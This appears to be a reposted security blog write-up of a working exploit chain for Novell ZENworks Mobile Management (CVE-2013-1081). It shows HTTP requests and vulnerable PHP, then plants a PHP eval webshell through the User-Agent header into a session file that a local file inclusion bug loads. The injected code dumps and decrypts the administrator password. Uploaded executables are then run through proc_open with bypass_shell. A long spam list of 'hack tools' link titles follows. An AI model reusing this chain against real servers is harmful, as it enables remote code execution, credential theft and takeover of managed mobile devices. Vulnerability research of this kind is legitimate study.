Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM
For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
<?php
session_start();
$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';
if ($Language !== '' && $Language != $_SESSION["language"])
{
//check for validity
if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
{
$_SESSION["language"] = $Language;
}
}
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
- Check if the "language" parameter is passed in on the request
- If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
- The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
- If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
- If the session variable "language" is set, include it into the page
- Authenticate
So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
Taking a look at the "download.php" file the following was observed:
<?phpThe first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)
session_start();
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];
$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);
$ext = substr(strrchr($filename, '.'), 1);
if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0)
{
} else
{
$_SESSION['$error'] = LOGIN_FAILED_TEXT;
header('Location: index.php');
}
This will create a session file named "sess_payload" that we can include, the file contains the following:
user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']);Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….
This functionality has been wrapped up into a metasploit module that is available on github:
Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
$wdir=getcwd()."\..\..\php\\\\temp\\\\";The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
$output=explode("\\n",+stream_get_contents($pipes[1]));
fclose($pipes[1]);
proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
This process was then rolled up into a metasploit module which is available here:
Update: Metasploit modules are now available as part of metasploit.
Related articles
- Hacking Tools 2020
- Pentest Tools List
- Pentest Tools List
- Hack Tools For Pc
- Hacker Tools Free Download
- Hack Tools For Ubuntu
- Hacking Tools Free Download
- New Hack Tools
- Nsa Hack Tools
- Hacking Tools Name
- Pentest Tools Port Scanner
- Hack Tools
- Nsa Hack Tools Download
- Hack Tool Apk No Root
- Pentest Automation Tools
- Pentest Tools For Windows
- Hacking Tools For Games
- Kik Hack Tools
- Hack Tools For Windows
- Ethical Hacker Tools
- Best Pentesting Tools 2018
- Install Pentest Tools Ubuntu
- Usb Pentest Tools
- How To Install Pentest Tools In Ubuntu
- Hacker Tools Apk Download
- Pentest Tools Tcp Port Scanner
- Hak5 Tools
- Android Hack Tools Github
- Nsa Hack Tools Download
- Hacking Tools For Windows 7
- Hacker Tools Linux
- Hacker Tools Linux
- Pentest Tools Github
- Hack Tools Online
- Hacker Tools Linux
- Pentest Tools Tcp Port Scanner
- Pentest Tools Download
- How To Install Pentest Tools In Ubuntu
- Hacker Tools For Ios
- Hack Tools For Ubuntu
- Hacker Tools Linux
- Pentest Tools Open Source
- Hacker Tools For Pc
- Pentest Tools For Android
- Tools For Hacker
- Pentest Tools Find Subdomains
- Hacking Tools Hardware
- World No 1 Hacker Software
- Hack Tools Download
- Tools For Hacker
- Underground Hacker Sites
- Easy Hack Tools
- Hacking Tools Free Download
- Pentest Tools Framework
- Pentest Tools Open Source
- Tools Used For Hacking
- Pentest Tools For Mac
- Hacking Tools For Windows 7
- Pentest Tools Framework
- Pentest Tools Tcp Port Scanner
- New Hack Tools
- Hacking Tools For Mac
- Pentest Tools Linux
- Android Hack Tools Github
- Hacker Tools 2020
- Underground Hacker Sites
- Pentest Tools For Android
- How To Hack
- Hacking Tools For Mac
- Pentest Tools Nmap
- Hacker Search Tools
- Hacking Tools Online
- Pentest Tools Online
- Hacking Tools Usb
- Top Pentest Tools
- Kik Hack Tools
- Hacker Tools 2019
- Hacker Search Tools
- Pentest Tools For Windows
- Pentest Tools Kali Linux
- Install Pentest Tools Ubuntu
- Pentest Tools Bluekeep
- Free Pentest Tools For Windows
- Pentest Tools Windows
- Hacker Tools Apk
- Hacker Tools
- Beginner Hacker Tools
- Hacking Tools 2020
- Hacking Tools Free Download
- Hacker Tools Apk Download
- Hacking Tools Usb
- Hacking Tools Software
- World No 1 Hacker Software
- Tools For Hacker
- Hacker Tools Hardware
- Hack Tools Download
- Best Pentesting Tools 2018
- Hacker Techniques Tools And Incident Handling
- Hacking Tools Software
- Easy Hack Tools
- Hackers Toolbox
- Install Pentest Tools Ubuntu
- Hack Tools For Ubuntu
- Pentest Tools Open Source
- Android Hack Tools Github
- Nsa Hack Tools
- Pentest Tools Subdomain
- Hacker Search Tools
- Computer Hacker
- Hacker Tools Apk Download
- Hacking Tools Online
- Usb Pentest Tools
- Hacking Tools 2020
- Pentest Tools Open Source
- Ethical Hacker Tools
- Beginner Hacker Tools
- Hacker Tools For Windows
- Hacking Tools And Software
More information